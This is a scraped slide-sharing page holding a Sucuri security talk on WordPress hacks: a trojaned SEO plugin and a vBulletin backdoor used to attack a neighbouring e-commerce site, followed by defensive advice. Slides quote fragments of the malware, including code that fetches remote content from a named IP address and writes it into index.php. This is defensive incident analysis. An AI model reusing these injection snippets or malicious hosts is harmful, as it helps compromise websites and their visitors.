Joomla! Day Atlanta 2014 - Website Security - The BasicsJoomla! Day Atlanta 2014 - Website Security - The Basics
Joomla! Day Atlanta 2014 - Website Security - The BasicsTony Perez
 
Word press website security
Word press website securityWord press website security
Word press website securityTony Perez
 
WordPress Website Security - Trends, Threats, Defenses
WordPress Website Security - Trends, Threats, DefensesWordPress Website Security - Trends, Threats, Defenses
WordPress Website Security - Trends, Threats, DefensesTony Perez
 
WordPress Security - Dealing With Today's Hacks
WordPress Security - Dealing With Today's HacksWordPress Security - Dealing With Today's Hacks
WordPress Security - Dealing With Today's HacksTony Perez
 
WordPress Security - The "No-BS" Version
WordPress Security - The "No-BS" VersionWordPress Security - The "No-BS" Version
WordPress Security - The "No-BS" VersionTony Perez
 
Word camp orange county 2012 enduser security
Word camp orange county 2012 enduser securityWord camp orange county 2012 enduser security
Word camp orange county 2012 enduser securityTony Perez
 

Mais de Tony Perez (14)

A Practical Security Framework for Website Owners
A Practical Security Framework for Website OwnersA Practical Security Framework for Website Owners
A Practical Security Framework for Website Owners
 
2017 WHD - Bridging the Divide Between Behavior and Security
2017 WHD - Bridging the Divide Between Behavior and Security2017 WHD - Bridging the Divide Between Behavior and Security
2017 WHD - Bridging the Divide Between Behavior and Security
 
Accounting for Website Security in Higher Education
Accounting for Website Security in Higher EducationAccounting for Website Security in Higher Education
Accounting for Website Security in Higher Education
 
Building a Security Framework for Websites
Building a Security Framework for WebsitesBuilding a Security Framework for Websites
Building a Security Framework for Websites
 
Business of People - Lessons Learned Building a Remote Workforce
Business of People - Lessons Learned Building a Remote WorkforceBusiness of People - Lessons Learned Building a Remote Workforce
Business of People - Lessons Learned Building a Remote Workforce
 
Website Security (WordPress) - It's About the Basics
Website Security (WordPress) - It's About the BasicsWebsite Security (WordPress) - It's About the Basics
Website Security (WordPress) - It's About the Basics
 
Website Security - Latest and Greatest (WordPress 2014)
Website Security - Latest and Greatest (WordPress 2014)Website Security - Latest and Greatest (WordPress 2014)
Website Security - Latest and Greatest (WordPress 2014)
 
WordCamp Minneapolis 2014 - Website Security Presentation - Sucuri Security
WordCamp Minneapolis 2014 - Website Security Presentation - Sucuri SecurityWordCamp Minneapolis 2014 - Website Security Presentation - Sucuri Security
WordCamp Minneapolis 2014 - Website Security Presentation - Sucuri Security
 
Joomla! Day Atlanta 2014 - Website Security - The Basics
Joomla! Day Atlanta 2014 - Website Security - The BasicsJoomla! Day Atlanta 2014 - Website Security - The Basics
Joomla! Day Atlanta 2014 - Website Security - The Basics
 
Word press website security
Word press website securityWord press website security
Word press website security
 
WordPress Website Security - Trends, Threats, Defenses
WordPress Website Security - Trends, Threats, DefensesWordPress Website Security - Trends, Threats, Defenses
WordPress Website Security - Trends, Threats, Defenses
 
WordPress Security - Dealing With Today's Hacks
WordPress Security - Dealing With Today's HacksWordPress Security - Dealing With Today's Hacks
WordPress Security - Dealing With Today's Hacks
 
WordPress Security - The "No-BS" Version
WordPress Security - The "No-BS" VersionWordPress Security - The "No-BS" Version
WordPress Security - The "No-BS" Version
 
Word camp orange county 2012 enduser security
Word camp orange county 2012 enduser securityWord camp orange county 2012 enduser security
Word camp orange county 2012 enduser security
 

Último

Inclusivity Essentials_ Creating Accessible Websites for Nonprofits .pdf
Inclusivity Essentials_ Creating Accessible Websites for Nonprofits .pdfInclusivity Essentials_ Creating Accessible Websites for Nonprofits .pdf
Inclusivity Essentials_ Creating Accessible Websites for Nonprofits .pdfTechSoup
 
Integumentary System SMP B. Pharm Sem I.ppt
Integumentary System SMP B. Pharm Sem I.pptIntegumentary System SMP B. Pharm Sem I.ppt
Integumentary System SMP B. Pharm Sem I.pptshraddhaparab530
 
Earth Day Presentation wow hello nice great
Earth Day Presentation wow hello nice greatEarth Day Presentation wow hello nice great
Earth Day Presentation wow hello nice greatYousafMalik24
 
Keynote by Prof. Wurzer at Nordex about IP-design
Keynote by Prof. Wurzer at Nordex about IP-designKeynote by Prof. Wurzer at Nordex about IP-design
Keynote by Prof. Wurzer at Nordex about IP-designMIPLM
 
ENG 5 Q4 WEEk 1 DAY 1 Restate sentences heard in one’s own words. Use appropr...
ENG 5 Q4 WEEk 1 DAY 1 Restate sentences heard in one’s own words. Use appropr...ENG 5 Q4 WEEk 1 DAY 1 Restate sentences heard in one’s own words. Use appropr...
ENG 5 Q4 WEEk 1 DAY 1 Restate sentences heard in one’s own words. Use appropr...JojoEDelaCruz
 
Concurrency Control in Database Management system
Concurrency Control in Database Management systemConcurrency Control in Database Management system
Concurrency Control in Database Management systemChristalin Nelson
 
Barangay Council for the Protection of Children (BCPC) Orientation.pptx
Barangay Council for the Protection of Children (BCPC) Orientation.pptxBarangay Council for the Protection of Children (BCPC) Orientation.pptx
Barangay Council for the Protection of Children (BCPC) Orientation.pptxCarlos105
 
Transaction Management in Database Management System
Transaction Management in Database Management SystemTransaction Management in Database Management System
Transaction Management in Database Management SystemChristalin Nelson
 
Difference Between Search & Browse Methods in Odoo 17
Difference Between Search & Browse Methods in Odoo 17Difference Between Search & Browse Methods in Odoo 17
Difference Between Search & Browse Methods in Odoo 17Celine George
 
ECONOMIC CONTEXT - PAPER 1 Q3: NEWSPAPERS.pptx
ECONOMIC CONTEXT - PAPER 1 Q3: NEWSPAPERS.pptxECONOMIC CONTEXT - PAPER 1 Q3: NEWSPAPERS.pptx
ECONOMIC CONTEXT - PAPER 1 Q3: NEWSPAPERS.pptxiammrhaywood
 
Virtual-Orientation-on-the-Administration-of-NATG12-NATG6-and-ELLNA.pdf
Virtual-Orientation-on-the-Administration-of-NATG12-NATG6-and-ELLNA.pdfVirtual-Orientation-on-the-Administration-of-NATG12-NATG6-and-ELLNA.pdf
Virtual-Orientation-on-the-Administration-of-NATG12-NATG6-and-ELLNA.pdfErwinPantujan2
 
Activity 2-unit 2-update 2024. English translation
Activity 2-unit 2-update 2024. English translationActivity 2-unit 2-update 2024. English translation
Activity 2-unit 2-update 2024. English translationRosabel UA
 
4.16.24 Poverty and Precarity--Desmond.pptx
4.16.24 Poverty and Precarity--Desmond.pptx4.16.24 Poverty and Precarity--Desmond.pptx
4.16.24 Poverty and Precarity--Desmond.pptxmary850239
 
AUDIENCE THEORY -CULTIVATION THEORY - GERBNER.pptx
AUDIENCE THEORY -CULTIVATION THEORY - GERBNER.pptxAUDIENCE THEORY -CULTIVATION THEORY - GERBNER.pptx
AUDIENCE THEORY -CULTIVATION THEORY - GERBNER.pptxiammrhaywood
 
Active Learning Strategies (in short ALS).pdf
Active Learning Strategies (in short ALS).pdfActive Learning Strategies (in short ALS).pdf
Active Learning Strategies (in short ALS).pdfPatidar M
 
ENGLISH 7_Q4_LESSON 2_ Employing a Variety of Strategies for Effective Interp...
ENGLISH 7_Q4_LESSON 2_ Employing a Variety of Strategies for Effective Interp...ENGLISH 7_Q4_LESSON 2_ Employing a Variety of Strategies for Effective Interp...
ENGLISH 7_Q4_LESSON 2_ Employing a Variety of Strategies for Effective Interp...JhezDiaz1
 
Grade 9 Quarter 4 Dll Grade 9 Quarter 4 DLL.pdf
Grade 9 Quarter 4 Dll Grade 9 Quarter 4 DLL.pdfGrade 9 Quarter 4 Dll Grade 9 Quarter 4 DLL.pdf
Grade 9 Quarter 4 Dll Grade 9 Quarter 4 DLL.pdfJemuel Francisco
 
Incoming and Outgoing Shipments in 3 STEPS Using Odoo 17
Incoming and Outgoing Shipments in 3 STEPS Using Odoo 17Incoming and Outgoing Shipments in 3 STEPS Using Odoo 17
Incoming and Outgoing Shipments in 3 STEPS Using Odoo 17Celine George
 
Field Attribute Index Feature in Odoo 17
Field Attribute Index Feature in Odoo 17Field Attribute Index Feature in Odoo 17
Field Attribute Index Feature in Odoo 17Celine George
 

Último (20)

Inclusivity Essentials_ Creating Accessible Websites for Nonprofits .pdf
Inclusivity Essentials_ Creating Accessible Websites for Nonprofits .pdfInclusivity Essentials_ Creating Accessible Websites for Nonprofits .pdf
Inclusivity Essentials_ Creating Accessible Websites for Nonprofits .pdf
 
Integumentary System SMP B. Pharm Sem I.ppt
Integumentary System SMP B. Pharm Sem I.pptIntegumentary System SMP B. Pharm Sem I.ppt
Integumentary System SMP B. Pharm Sem I.ppt
 
Earth Day Presentation wow hello nice great
Earth Day Presentation wow hello nice greatEarth Day Presentation wow hello nice great
Earth Day Presentation wow hello nice great
 
Raw materials used in Herbal Cosmetics.pptx
Raw materials used in Herbal Cosmetics.pptxRaw materials used in Herbal Cosmetics.pptx
Raw materials used in Herbal Cosmetics.pptx
 
Keynote by Prof. Wurzer at Nordex about IP-design
Keynote by Prof. Wurzer at Nordex about IP-designKeynote by Prof. Wurzer at Nordex about IP-design
Keynote by Prof. Wurzer at Nordex about IP-design
 
ENG 5 Q4 WEEk 1 DAY 1 Restate sentences heard in one’s own words. Use appropr...
ENG 5 Q4 WEEk 1 DAY 1 Restate sentences heard in one’s own words. Use appropr...ENG 5 Q4 WEEk 1 DAY 1 Restate sentences heard in one’s own words. Use appropr...
ENG 5 Q4 WEEk 1 DAY 1 Restate sentences heard in one’s own words. Use appropr...
 
Concurrency Control in Database Management system
Concurrency Control in Database Management systemConcurrency Control in Database Management system
Concurrency Control in Database Management system
 
Barangay Council for the Protection of Children (BCPC) Orientation.pptx
Barangay Council for the Protection of Children (BCPC) Orientation.pptxBarangay Council for the Protection of Children (BCPC) Orientation.pptx
Barangay Council for the Protection of Children (BCPC) Orientation.pptx
 
Transaction Management in Database Management System
Transaction Management in Database Management SystemTransaction Management in Database Management System
Transaction Management in Database Management System
 
Difference Between Search & Browse Methods in Odoo 17
Difference Between Search & Browse Methods in Odoo 17Difference Between Search & Browse Methods in Odoo 17
Difference Between Search & Browse Methods in Odoo 17
 
ECONOMIC CONTEXT - PAPER 1 Q3: NEWSPAPERS.pptx
ECONOMIC CONTEXT - PAPER 1 Q3: NEWSPAPERS.pptxECONOMIC CONTEXT - PAPER 1 Q3: NEWSPAPERS.pptx
ECONOMIC CONTEXT - PAPER 1 Q3: NEWSPAPERS.pptx
 
Virtual-Orientation-on-the-Administration-of-NATG12-NATG6-and-ELLNA.pdf
Virtual-Orientation-on-the-Administration-of-NATG12-NATG6-and-ELLNA.pdfVirtual-Orientation-on-the-Administration-of-NATG12-NATG6-and-ELLNA.pdf
Virtual-Orientation-on-the-Administration-of-NATG12-NATG6-and-ELLNA.pdf
 
Activity 2-unit 2-update 2024. English translation
Activity 2-unit 2-update 2024. English translationActivity 2-unit 2-update 2024. English translation
Activity 2-unit 2-update 2024. English translation
 
4.16.24 Poverty and Precarity--Desmond.pptx
4.16.24 Poverty and Precarity--Desmond.pptx4.16.24 Poverty and Precarity--Desmond.pptx
4.16.24 Poverty and Precarity--Desmond.pptx
 
AUDIENCE THEORY -CULTIVATION THEORY - GERBNER.pptx
AUDIENCE THEORY -CULTIVATION THEORY - GERBNER.pptxAUDIENCE THEORY -CULTIVATION THEORY - GERBNER.pptx
AUDIENCE THEORY -CULTIVATION THEORY - GERBNER.pptx
 
Active Learning Strategies (in short ALS).pdf
Active Learning Strategies (in short ALS).pdfActive Learning Strategies (in short ALS).pdf
Active Learning Strategies (in short ALS).pdf
 
ENGLISH 7_Q4_LESSON 2_ Employing a Variety of Strategies for Effective Interp...
ENGLISH 7_Q4_LESSON 2_ Employing a Variety of Strategies for Effective Interp...ENGLISH 7_Q4_LESSON 2_ Employing a Variety of Strategies for Effective Interp...
ENGLISH 7_Q4_LESSON 2_ Employing a Variety of Strategies for Effective Interp...
 
Grade 9 Quarter 4 Dll Grade 9 Quarter 4 DLL.pdf
Grade 9 Quarter 4 Dll Grade 9 Quarter 4 DLL.pdfGrade 9 Quarter 4 Dll Grade 9 Quarter 4 DLL.pdf
Grade 9 Quarter 4 Dll Grade 9 Quarter 4 DLL.pdf
 
Incoming and Outgoing Shipments in 3 STEPS Using Odoo 17
Incoming and Outgoing Shipments in 3 STEPS Using Odoo 17Incoming and Outgoing Shipments in 3 STEPS Using Odoo 17
Incoming and Outgoing Shipments in 3 STEPS Using Odoo 17
 
Field Attribute Index Feature in Odoo 17
Field Attribute Index Feature in Odoo 17Field Attribute Index Feature in Odoo 17
Field Attribute Index Feature in Odoo 17
 

WordPress Security - Learning From Hacks

  • 2. This is me! Sucuri Inc. Website Security o Incident Handling o Log Analysis o o Tony Perez, COO - Sucuri, Inc. sucuri.net @perezbox
  • 3. Let’s Learn from Website Attacks Analyze some of the things we have seen in recent days/weeks, and better understand what we need to be doing as website owners. Tony Perez, COO - Sucuri, Inc. sucuri.net @perezbox
  • 4.
  • 5. Attack Scenerios o The Art of Phishing o Stealing Credit Cards Tony Perez, COO - Sucuri, Inc. sucuri.net @perezbox
  • 6. Scenerio Uno (One) The art of Phishing Naive Users
  • 7. Attack of Opportunity o Holiday season / Holiday spirit o Did you say Free? Tony Perez, COO - Sucuri, Inc. sucuri.net @perezbox
  • 8.
  • 9. Red Flag[s] <A href="http://www.[infecteddomain].com.au/wp -content/all-in-one-seopack%20Pro%20v2.1.zip">All in One SEO Pack V2.1 Download Link</A> Red Alert: http://www.[infecteddomain].com.au Tony Perez, COO - Sucuri, Inc. sucuri.net @perezbox
  • 10. Difference o o Pro Version? Legit Version? Modified file: aioseop_class.php Tony Perez, COO - Sucuri, Inc. sucuri.net @perezbox
  • 11. Intent o Redirection - porn or exploit kits o Target: index.php o Taking content from here: $code_txt = 'http://91.239.15.61/o1.txt’; o Placing it in the files here: $index_path = $path.'/index.php'; if(file_put_contents($index_path, $code)){ Tony Perez, COO - Sucuri, Inc. sucuri.net @perezbox
  • 12. How? o Index.php payload: o Using curl to pull content from here: $url = http://91.239.15.61/java/google.php; Tony Perez, COO - Sucuri, Inc. sucuri.net @perezbox
  • 13. Payload o Pulls content from: http://91.239.15.61/google.js - Redirection to Porn Sites http://91.239.15.61/g.php - Exploit Kits Tony Perez, COO - Sucuri, Inc. sucuri.net @perezbox
  • 14. Lesson to Be Learned o Trust but verify sources o This is not isolated to just plugins, it can happen to themes as well o This is the season in which attackers prey on our need to spend $$$ and be online. Be vigilant! o The vulnerability was the website administrator… Tony Perez, COO - Sucuri, Inc. sucuri.net @perezbox
  • 15. Scenerio Dos (Two) Got e-Commerce? Leverage 3rd-party CMS applications in your stack?
  • 16. Got e-Commerce? o Business owners <3 E-commerce o CMS extensibility = WooCommerce o Quick setup of payment collection systems for goods o Awesome, right? Tony Perez, COO - Sucuri, Inc. sucuri.net @perezbox
  • 17. Big Target o Credit Card = Cha-Ching o Used/shared/sold underground o Impact is catastrophic o Blacklisting o Ban o No more cash flow! No more Trust! Tony Perez, COO - Sucuri, Inc. sucuri.net @perezbox
  • 18. Cross-contamination Simple concept in which your website is attacked and infected by a neighboring site in the same environment Tony Perez, COO - Sucuri, Inc. sucuri.net @perezbox
  • 19. vBulletin o Popular CMS Application for Forums o WordPress + vBulletin Configurations Common Tony Perez, COO - Sucuri, Inc. sucuri.net @perezbox
  • 20. Scenerio o WordPress: Main website | Blog | e-Commerce o vBulletin: Forum o 1 Server Tony Perez, COO - Sucuri, Inc. sucuri.net @perezbox
  • 21. Payload Found here: /wp-admin/includes/list.php Tony Perez, COO - Sucuri, Inc. sucuri.net @perezbox
  • 22. How? o It’s about the journey folks… Tony Perez, COO - Sucuri, Inc. sucuri.net @perezbox
  • 23. Scenerio o list.php? o shop.txt? Tony Perez, COO - Sucuri, Inc. sucuri.net @perezbox
  • 24. That’s Interesting /forum/ajax.php?edit= Tony Perez, COO - Sucuri, Inc. sucuri.net @perezbox
  • 25. vBulletin Plugin o Backdoor shell was installed into vBulletin giving the attacker the tools they needed to attack the WordPress installation. Tony Perez, COO - Sucuri, Inc. sucuri.net @perezbox
  • 26. Dump of Users Tony Perez, COO - Sucuri, Inc. sucuri.net @perezbox
  • 27. Attack Vector o Access Control Tony Perez, COO - Sucuri, Inc. sucuri.net @perezbox
  • 28. Lessons to be Learned o Attackers are smart – surprise!!! o Cross-contamination is a real threat today! o Must be diligent across our stack! o Isolate applications if possible. Tony Perez, COO - Sucuri, Inc. sucuri.net @perezbox
  • 29. What can you do? Lets get proactive!
  • 30. Harsh Reality None of the security plugins out there would have prevented either of these attacks. So much for all those hardening tips.. Tony Perez, COO - Sucuri, Inc. sucuri.net @perezbox
  • 31. Two Important Vectors o Access control o Within your control… o Software vulnerabilities o Not so much… Tony Perez, COO - Sucuri, Inc. sucuri.net @perezbox
  • 32. Defense in Depth • There is no single cure • Layered Defenses • Combination of tools and actions – Combine: Protection and Detection Tony Perez, COO - Sucuri, Inc. sucuri.net @perezbox
  • 33. Access Control o Google Authenticator – 2FA o http://wordpress.org/plugins/google-authenticator/ o Duo Security – 2FA o http://wordpress.org/plugins/duo-wordpress/ o Login Secure Solutions – Policy / Enforcement o http://wordpress.org/plugins/login-security-solution/ o Sucuri CloudProxy / Detection / Remedation - Complete Website Security o http://sucuri.net/signup Tony Perez, COO - Sucuri, Inc. sucuri.net @perezbox
  • 34. Software Vulnerabilities o Trusted Sources o Start with the repo and established communities o If you’re not a developer this is going to be beyond your reach mostly o Web Application Firewall (WAF) Plugins o Highly ineffective, evading and bypassing is easy o Cause Denial of Service attacks o SaaS based Web Application Firewall (WAF) more effective! o Sucuri CloudProxy WAF Tony Perez, COO - Sucuri, Inc. sucuri.net @perezbox
  • 35. Auditing • Know what is going on with your site – Integrity Checks – Logging in / Logging out – Changes being made • More important than half the hardening tips you read on line today • Options: – WP Security Audit log http://wordpress.org/plugins/wp-securityaudit-log/ – Sucuri Premium Plugin http://wordpress.sucuri.net Tony Perez, COO - Sucuri, Inc. sucuri.net @perezbox
  • 36. If all else fails… o Be sure you have backups… o VaultPress – WordPress Sites o Sucuri Backups – WordPress and Everything else o SaaS based Backups more effective! Tony Perez, COO - Sucuri, Inc. sucuri.net @perezbox
  • 37. Tony Perez @perezbox | @sucuri_security tony@sucuri.net #wordsesh Tony Perez, COO - Sucuri, Inc. sucuri.net @perezbox

Notas do Editor

  1. Defense in depth is a pretty standard phrase used in the security world in which there is no dependency on any one control, but rather a series of controls implemented throughout the stack to ensure the integrity and security. It’s simple and effective, yet many don’t apply it for whatever reason. We’re too busy focusing on that quick solution that will end all my problems. That one plugins that will harden my entire site to the point where I won’t be able to access it and none of my plugins will work.
  2. Be sure to check out Jason Cosper’s presentation earlier this evening, should be up on WordSesh soon, but he goes through some good tips on hardening your WordPress site.